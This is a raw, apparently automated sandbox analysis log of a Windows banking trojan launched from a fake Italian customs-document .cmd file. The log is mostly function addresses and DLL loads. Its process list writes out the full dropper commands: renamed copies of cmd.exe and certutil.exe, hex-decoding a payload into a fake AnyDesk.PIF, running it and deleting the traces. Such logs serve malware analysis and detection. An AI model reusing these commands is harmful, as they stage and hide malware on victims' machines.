      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C44E06_2_00007FF67C4C44E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5224D46_2_00007FF67C5224D4
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B620C49_2_02B620C4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DBAA5410_2_00007FF7E1DBAA54
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB8DF810_2_00007FF7E1DB8DF8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC555410_2_00007FF7E1DC5554
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC785410_2_00007FF7E1DC7854
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB341010_2_00007FF7E1DB3410
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC37D810_2_00007FF7E1DC37D8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DD7F0010_2_00007FF7E1DD7F00
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB6EE410_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DBE68010_2_00007FF7E1DBE680
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DDEE8810_2_00007FF7E1DDEE88
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC0A6C10_2_00007FF7E1DC0A6C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB524010_2_00007FF7E1DB5240
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DBD25010_2_00007FF7E1DBD250
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB9E5010_2_00007FF7E1DB9E50
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB765010_2_00007FF7E1DB7650
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB222010_2_00007FF7E1DB2220
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC422410_2_00007FF7E1DC4224
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB4A3010_2_00007FF7E1DB4A30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DDAA3010_2_00007FF7E1DDAA30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DBCE1010_2_00007FF7E1DBCE10
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DDD9D010_2_00007FF7E1DDD9D0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB81D410_2_00007FF7E1DB81D4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DE153810_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB7D3010_2_00007FF7E1DB7D30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB851010_2_00007FF7E1DB8510
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DBB0D810_2_00007FF7E1DBB0D8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC18D410_2_00007FF7E1DC18D4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB188410_2_00007FF7E1DB1884
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DDAC4C10_2_00007FF7E1DDAC4C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB2C4810_2_00007FF7E1DB2C48
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB6BE010_2_00007FF7E1DB6BE0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DDAFBC10_2_00007FF7E1DDAFBC
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB3F9010_2_00007FF7E1DB3F90
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB5B7010_2_00007FF7E1DB5B70
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB9B5010_2_00007FF7E1DB9B50
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB372C10_2_00007FF7E1DB372C
      Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7E1DC3448 appears 54 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67C577BAC appears 34 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67C577D70 appears 35 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67C4EBC9C appears 280 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67C4BD1C8 appears 41 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67C5C64A6 appears 173 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67C54EB98 appears 93 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67C56ABFC appears 818 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67C5BF11C appears 37 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67C5BF1B8 appears 183 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF67C570D10 appears 181 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02B64860 appears 949 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02B64500 appears 33 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02B644DC appears 74 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02B7894C appears 56 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02B789D0 appears 45 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02B646D4 appears 244 times
      Source: classification engineClassification label: mal100.bank.troj.evad.winCMD@22/11@1/1
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,3_2_00007FF7E1DB32B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,6_2_00007FF67C59826C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,3_2_00007FF7E1DDFB54
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B7DE0 wcschr,#357,wcschr,CoCreateInstance,#359,SysFreeString,SysFreeString,SysAllocString,SysFreeString,#359,SysFreeString,SysFreeString,#357,SysFreeString,SysFreeString,LocalAlloc,#357,#357,SysFreeString,SysFreeString,memmove,SysFreeString,SysFreeString,#357,SysFreeString,SysFreeString,#256,#359,6_2_00007FF67C4B7DE0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5C3148 FindResourceExW,LoadResource,6_2_00007FF67C5C3148
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
      Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S Jump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: version.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: url.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieframe.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: userenv.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netutils.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ?p .dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???p.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
